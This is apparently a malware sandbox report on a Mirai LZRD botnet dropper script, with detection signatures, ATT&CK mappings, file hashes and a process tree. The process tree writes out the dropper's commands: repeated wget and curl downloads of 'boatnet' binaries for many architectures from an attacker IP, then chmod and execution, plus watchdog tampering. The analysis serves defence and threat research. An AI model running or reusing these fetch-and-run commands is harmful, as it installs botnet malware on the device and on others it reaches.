mirai | a6bf5dd9b9c5ea86b4a816ea60f94bc0cf68ef6c23ec63d52edf9ddf875d7e34

Analysis

max time kernel
150s
max time network
141s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
19/01/2025, 18:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

a6ab6f96f6881539ccc0aefa53d99da6
SHA1

eeeb59012c94058a106073e1595f84df20445979
SHA256

a6bf5dd9b9c5ea86b4a816ea60f94bc0cf68ef6c23ec63d52edf9ddf875d7e34
SHA512

ef0e55585920063d79f5508c6546ebe72dae9c8a5d59faf2fa3d3f3200fa6e970c0ead949638fd853bd752536aea1784fe70397fde0e8bee12478e55b3e6c600

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
873	chmod
755	chmod
773	chmod
827	chmod
867	chmod
891	chmod
729	chmod
736	chmod
792	chmod
879	chmod
744	chmod
810	chmod
816	chmod
847	chmod
885	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/WTF	730	WTF
/tmp/WTF	737	WTF
/tmp/WTF	745	WTF
/tmp/WTF	757	WTF
/tmp/WTF	774	WTF
/tmp/WTF	793	WTF
/tmp/WTF	811	WTF
/tmp/WTF	817	WTF
/tmp/WTF	829	WTF
/tmp/WTF	848	WTF
/tmp/WTF	868	WTF
/tmp/WTF	874	WTF
/tmp/WTF	880	WTF
/tmp/WTF	886	WTF
/tmp/WTF	892	WTF

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	WTF
File opened for modification	/dev/misc/watchdog	WTF

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	WTF
File opened for modification	/bin/watchdog	WTF

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/fstream-1.dat	upx
behavioral3/files/fstream-4.dat	upx

Reads runtime system information 63 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/775/cmdline	WTF
File opened for reading	/proc/801/cmdline	WTF
File opened for reading	/proc/806/cmdline	WTF
File opened for reading	/proc/810/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/405/cmdline	WTF
File opened for reading	/proc/777/cmdline	WTF
File opened for reading	/proc/843/cmdline	WTF
File opened for reading	/proc/883/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/708/cmdline	WTF
File opened for reading	/proc/856/cmdline	WTF
File opened for reading	/proc/876/cmdline	WTF
File opened for reading	/proc/698/cmdline	WTF
File opened for reading	/proc/832/cmdline	WTF
File opened for reading	/proc/697/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/851/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/667/cmdline	WTF
File opened for reading	/proc/691/cmdline	WTF
File opened for reading	/proc/726/cmdline	WTF
File opened for reading	/proc/800/cmdline	WTF
File opened for reading	/proc/831/cmdline	WTF
File opened for reading	/proc/837/cmdline	WTF
File opened for reading	/proc/813/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/740/cmdline	WTF
File opened for reading	/proc/814/cmdline	WTF
File opened for reading	/proc/748/cmdline	WTF
File opened for reading	/proc/823/cmdline	WTF
File opened for reading	/proc/857/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/692/cmdline	WTF
File opened for reading	/proc/760/cmdline	WTF
File opened for reading	/proc/678/cmdline	WTF
File opened for reading	/proc/696/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/870/cmdline	WTF
File opened for reading	/proc/891/cmdline	WTF
File opened for reading	/proc/654/cmdline	WTF
File opened for reading	/proc/833/cmdline	WTF
File opened for reading	/proc/889/cmdline	WTF
File opened for reading	/proc/758/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/742/cmdline	WTF
File opened for reading	/proc/789/cmdline	WTF
File opened for reading	/proc/795/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/659/cmdline	WTF
File opened for reading	/proc/668/cmdline	WTF
File opened for reading	/proc/701/cmdline	WTF
File opened for reading	/proc/702/cmdline	WTF
File opened for reading	/proc/797/cmdline	WTF
File opened for reading	/proc/804/cmdline	WTF
File opened for reading	/proc/819/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/877/cmdline	WTF

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
732	wget
734	curl
735	cat

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/boatnet.i468	curl
File opened for modification	/tmp/boatnet.i686	curl
File opened for modification	/tmp/boatnet.arc	wget
File opened for modification	/tmp/boatnet.x86_64	curl
File opened for modification	/tmp/boatnet.arm5	wget
File opened for modification	/tmp/boatnet.x86	curl
File opened for modification	/tmp/WTF	ohshit.sh
File opened for modification	/tmp/boatnet.arc	curl
File opened for modification	/tmp/boatnet.mpsl	curl
File opened for modification	/tmp/boatnet.arm	curl
File opened for modification	/tmp/boatnet.ppc	curl
File opened for modification	/tmp/boatnet.ppc	wget
File opened for modification	/tmp/boatnet.m68k	wget
File opened for modification	/tmp/boatnet.m68k	curl
File opened for modification	/tmp/boatnet.mips	wget
File opened for modification	/tmp/boatnet.arm	wget
File opened for modification	/tmp/boatnet.spc	wget
File opened for modification	/tmp/boatnet.sh4	wget
File opened for modification	/tmp/boatnet.mips	curl
File opened for modification	/tmp/boatnet.arm6	curl
File opened for modification	/tmp/boatnet.x86	wget
File opened for modification	/tmp/boatnet.mpsl	wget
File opened for modification	/tmp/boatnet.arm5	curl
File opened for modification	/tmp/boatnet.arm6	wget
File opened for modification	/tmp/boatnet.arm7	curl
File opened for modification	/tmp/boatnet.spc	curl
File opened for modification	/tmp/boatnet.sh4	curl
File opened for modification	/tmp/boatnet.arm7	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:701
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.x86
  2⤵
  - Writes file to tmp directory
  PID:705
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:721
- /bin/cat
  cat boatnet.x86
  2⤵
  PID:728
- /bin/chmod
  chmod +x boatnet.x86 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:729
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:730
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:732
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:734
- /bin/cat
  cat boatnet.mips
  2⤵
  - System Network Configuration Discovery
  PID:735
- /bin/chmod
  chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:737
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.arc
  2⤵
  - Writes file to tmp directory
  PID:741
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:742
- /bin/cat
  cat boatnet.arc
  2⤵
  PID:743
- /bin/chmod
  chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:745
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.i468
  2⤵
  PID:747
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.i468
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:748
- /bin/cat
  cat boatnet.i468
  2⤵
  PID:753
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:755
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:757
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.i686
  2⤵
  PID:758
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:764
- /bin/cat
  cat boatnet.i686
  2⤵
  PID:772
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:773
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:774
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.x86_64
  2⤵
  PID:775
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.x86_64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:781
- /bin/cat
  cat boatnet.x86_64
  2⤵
  PID:790
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:792
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:793
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.mpsl
  2⤵
  - Writes file to tmp directory
  PID:795
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:804
- /bin/cat
  cat boatnet.mpsl
  2⤵
  PID:809
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:810
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:811
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.arm
  2⤵
  - Writes file to tmp directory
  PID:813
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:814
- /bin/cat
  cat boatnet.arm
  2⤵
  PID:815
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-yauoPk WTF
  2⤵
  - File and Directory Permissions Modification
  PID:816
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:817
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.arm5
  2⤵
  - Writes file to tmp directory
  PID:819
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:823
- /bin/cat
  cat boatnet.arm5
  2⤵
  PID:826
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:827
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:829
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.arm6
  2⤵
  - Writes file to tmp directory
  PID:832
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:837
- /bin/cat
  cat boatnet.arm6
  2⤵
  PID:846
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:847
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:848
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.arm7
  2⤵
  - Writes file to tmp directory
  PID:851
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:858
- /bin/cat
  cat boatnet.arm7
  2⤵
  PID:866
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:867
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:868
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.ppc
  2⤵
  - Writes file to tmp directory
  PID:870
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:871
- /bin/cat
  cat boatnet.ppc
  2⤵
  PID:872
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:873
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:874
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.spc
  2⤵
  - Writes file to tmp directory
  PID:876
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.spc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:877
- /bin/cat
  cat boatnet.spc
  2⤵
  PID:878
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:879
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:880
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.m68k
  2⤵
  - Writes file to tmp directory
  PID:882
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:883
- /bin/cat
  cat boatnet.m68k
  2⤵
  PID:884
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:885
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:886
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.sh4
  2⤵
  - Writes file to tmp directory
  PID:888
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:889
- /bin/cat
  cat boatnet.sh4
  2⤵
  PID:890
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:891
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/WTF

Filesize
30KB

MD5
4f16ad7bf124db03b82939cfae92f15e

SHA1
6c6d17f48d583c5d3c002f4fc3a5390642d637fe

SHA256
96d6d379169a9a89a3704fbdeebce0698200440dcd5e6d814a96f2960f463573

SHA512
c01e6c9fd4475b69092e1cc6f9eaadefc54d91dffcee63c1c23f9ad3b392791f0371f841f075a948ce67f8d65387fbaef38c943d67511f9d143d83667e50c2cf

Download Submit
/tmp/WTF

Filesize
121KB

MD5
ec59d866ca314089702cad40a77aeebc

SHA1
4fa9bd7716542472cfa27dc9dc4dd664633af350

SHA256
c9216d4e33ba2a5ad059029216b4401f360e3db0e326975ebf088b8a8588d472

SHA512
d42862983fe554e1ce6873fb9e5763451cf052d97452bcdc92c298a374f922e57d76569d915708a261890088f8da0b881e6407979b497486ce7da7493f3a650b

Download Submit
/tmp/WTF

Filesize
220B

MD5
f1c24d9fa40a047ae22d2d3ae7dfeac9

SHA1
750274b02d5f5b00026a4f55b020f4285c693533

SHA256
219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc

SHA512
36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

Download Submit
/tmp/WTF

Filesize
220B

MD5
a8f502a6fb3b7b940e922c951d9e493a

SHA1
fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf

SHA256
748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec

SHA512
e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338

Download Submit
/tmp/WTF

Filesize
75KB

MD5
839f6ad27dac29d4bb109eb01539a914

SHA1
3a477d4e91439b652554cc450c97da6769883b7f

SHA256
58b6d063fdfd52f1f8054fa6223aa31fe4f408d18cb4ad7275b63403b1fcbb0d

SHA512
706816e8ba5558bd80a53c5e8584ee85ee4b4a3a9a4db28916954435d7f98802215cf62b77bf716a93992102c9755853c308e7d235fd61e78d857e463b12e725

Download Submit
/tmp/boatnet.x86

Filesize
28KB

MD5
3630b4a04d550fb036675b516a910399

SHA1
7dd4e3efc4a7713d80ec4b8fbc5c0fd649038e7b

SHA256
a288c8c9d8fd6c92636bef0e8acf08f0d0d20b4108af37cea8385e7ad947dc67

SHA512
e33d21707d574422331610445e4fcdc08b7064f6988c022d27cc3650392940561891bd3ba7d97bc3ee1653ab818c7c815c65b2e8ffa0a14b9c6ea801da499b71

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads